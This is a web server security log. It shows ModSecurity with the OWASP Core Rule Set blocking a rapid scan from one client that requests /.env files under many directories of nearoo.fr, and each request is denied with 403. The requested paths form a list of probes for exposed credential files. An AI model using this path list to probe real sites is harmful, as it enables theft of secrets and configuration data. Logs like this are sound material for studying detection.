[Mon May 11 16:54:37.161303 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cronlab/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHRAAAAQI"]
[Mon May 11 16:54:37.161526 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cronlab/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHRAAAAQI"]
[Mon May 11 16:54:37.340326 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cron/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHRQAAAQI"]
[Mon May 11 16:54:37.340554 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cron/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHRQAAAQI"]
[Mon May 11 16:54:37.340785 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cron/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHRQAAAQI"]
[Mon May 11 16:54:37.628650 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /en/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/en/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHRwAAAQI"]
[Mon May 11 16:54:37.628869 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/en/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHRwAAAQI"]
[Mon May 11 16:54:37.629090 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/en/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHRwAAAQI"]
[Mon May 11 16:54:37.875017 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /administrator/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/administrator/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHSAAAAQI"]
[Mon May 11 16:54:37.875213 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/administrator/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHSAAAAQI"]
[Mon May 11 16:54:37.875432 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/administrator/.env"] [unique_id "agHtrUWKUxpmnkK7zHyHSAAAAQI"]
[Mon May 11 16:54:38.039100 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /psnlink/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/psnlink/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHSQAAAQI"]
[Mon May 11 16:54:38.039323 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/psnlink/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHSQAAAQI"]
[Mon May 11 16:54:38.039545 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/psnlink/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHSQAAAQI"]
[Mon May 11 16:54:38.187865 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /exapi/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/exapi/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHSgAAAQI"]
[Mon May 11 16:54:38.188081 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/exapi/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHSgAAAQI"]
[Mon May 11 16:54:38.188356 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/exapi/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHSgAAAQI"]
[Mon May 11 16:54:38.388451 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /sitemaps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/sitemaps/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHSwAAAQI"]
[Mon May 11 16:54:38.388678 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/sitemaps/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHSwAAAQI"]
[Mon May 11 16:54:38.388906 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/sitemaps/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHSwAAAQI"]
[Mon May 11 16:54:38.535587 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.backup1"] [unique_id "agHtrkWKUxpmnkK7zHyHTAAAAQI"]
[Mon May 11 16:54:38.535814 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.backup1"] [unique_id "agHtrkWKUxpmnkK7zHyHTAAAAQI"]
[Mon May 11 16:54:38.536053 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.backup1"] [unique_id "agHtrkWKUxpmnkK7zHyHTAAAAQI"]
[Mon May 11 16:54:38.830416 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup2"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/.env.backup2"] [unique_id "agHtrkWKUxpmnkK7zHyHTQAAAQI"]
[Mon May 11 16:54:38.830618 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/.env.backup2"] [unique_id "agHtrkWKUxpmnkK7zHyHTQAAAQI"]
[Mon May 11 16:54:38.830846 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/.env.backup2"] [unique_id "agHtrkWKUxpmnkK7zHyHTQAAAQI"]
[Mon May 11 16:54:38.954663 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /logs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/logs/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHTgAAAQI"]
[Mon May 11 16:54:38.954861 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/logs/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHTgAAAQI"]
[Mon May 11 16:54:38.955062 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/logs/.env"] [unique_id "agHtrkWKUxpmnkK7zHyHTgAAAQI"]
[Mon May 11 16:54:39.192454 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cache/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/cache/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHUAAAAQI"]
[Mon May 11 16:54:39.192658 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/cache/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHUAAAAQI"]
[Mon May 11 16:54:39.192870 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/cache/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHUAAAAQI"]
[Mon May 11 16:54:39.347461 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mailer/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHUQAAAQI"]
[Mon May 11 16:54:39.347682 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mailer/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHUQAAAQI"]
[Mon May 11 16:54:39.347895 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mailer/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHUQAAAQI"]
[Mon May 11 16:54:39.500770 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/mail/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHUgAAAQI"]
[Mon May 11 16:54:39.500955 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/mail/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHUgAAAQI"]
[Mon May 11 16:54:39.501187 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/mail/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHUgAAAQI"]
[Mon May 11 16:54:39.702491 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /email/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/email/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHVAAAAQI"]
[Mon May 11 16:54:39.702729 2026] [security2:error] [pid 1411055:tid 1411059] [client 13.203.95.122:54530] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/email/.env"] [unique_id "agHtr0WKUxpmnkK7zHyHVAAAAQI"]
